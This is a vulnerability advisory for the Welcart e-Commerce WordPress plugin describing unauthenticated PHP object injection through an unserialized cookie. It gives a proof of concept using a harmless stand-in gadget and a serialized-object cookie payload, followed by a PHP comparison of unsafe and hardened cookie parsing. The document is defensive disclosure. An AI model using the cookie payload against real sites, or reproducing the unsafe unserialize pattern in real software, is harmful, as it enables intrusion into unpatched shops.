wpvulndb | Krzysztof Zając (CERT PL) | WPVDB-ID:0ACD613E-DBD6-42AE-9F3D-6D6E77A4C1B7
History: Nov 10, 2023 - 12:00 a.m.

Welcart e-Commerce < 2.9.5 - Unauthenticated PHP Object Injection

Source: wpscan.com
Tags: welcart e-commerce, unauthenticated users, php object injection, cookie, web developer, gadget chain, blog security

AI Score: 7.8 High (Confidence: Low)
EPSS: 0.001 Low (Percentile: 43.4%)

Description

The plugin unserializes user input from cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.

PoC

To simulate a gadget chain, put the following code in a plugin:

    class Evil {
        public function __wakeup() : void {
            die("Arbitrary deserialization");
        }
    }

Then execute the command below in the browser's web developer console while on the blog as an unauthenticated user:

    document.cookie='usces_cookie=O:4:"Evil":0:{}'

Refresh the page to see the 'Arbitrary deserialization' message displayed.
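How the unsafe cookie handling described above compares with two hardened forms, as an added PHP example (not Welcart's code and not part of the advisory). The `read_cookie_*` function names are hypothetical, and `Evil` is the PoC's stand-in gadget changed to set a flag instead of calling `die()`.

```php
<?php
// Added illustration; not Welcart code. Function names are hypothetical.

// Stand-in gadget from the PoC; records the call instead of calling die().
class Evil {
    public static bool $fired = false;
    public function __wakeup(): void { self::$fired = true; }
}

// Unsafe pattern the advisory describes: cookie bytes go straight into
// unserialize(), so any loaded class with magic methods can be instantiated.
function read_cookie_unsafe(string $raw) {
    return unserialize($raw);
}

// Hardened form 1: keep the serialized format but refuse to build objects.
// With allowed_classes => false, objects become __PHP_Incomplete_Class and
// magic methods such as __wakeup() never run. Anything that is not a plain
// array is discarded.
function read_cookie_no_classes(string $raw): array {
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($data) ? $data : [];
}

// Hardened form 2: a data-only format (JSON) that cannot express objects.
function read_cookie_json(string $raw): array {
    $data = json_decode($raw, true);
    return is_array($data) ? $data : [];
}

$payload = 'O:4:"Evil":0:{}';   // cookie value from the PoC

read_cookie_unsafe($payload);
echo 'unsafe:        gadget fired = ', var_export(Evil::$fired, true), "\n";

Evil::$fired = false;
$safe = read_cookie_no_classes($payload);
echo 'no classes:    gadget fired = ', var_export(Evil::$fired, true),
     ', result = ', json_encode($safe), "\n";

echo 'json:          result = ', json_encode(read_cookie_json($payload)), "\n";

// Constructed sample of a legitimate array-only cookie; it still round-trips.
$legit = serialize(['name' => 'alice', 'remember' => '1']);
echo 'legit cookie:  result = ', json_encode(read_cookie_no_classes($legit)), "\n";
```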

| CPE | Name | Operator | Version |
|-----|------|----------|---------|
|     |      | eq       | 2.9.5   |
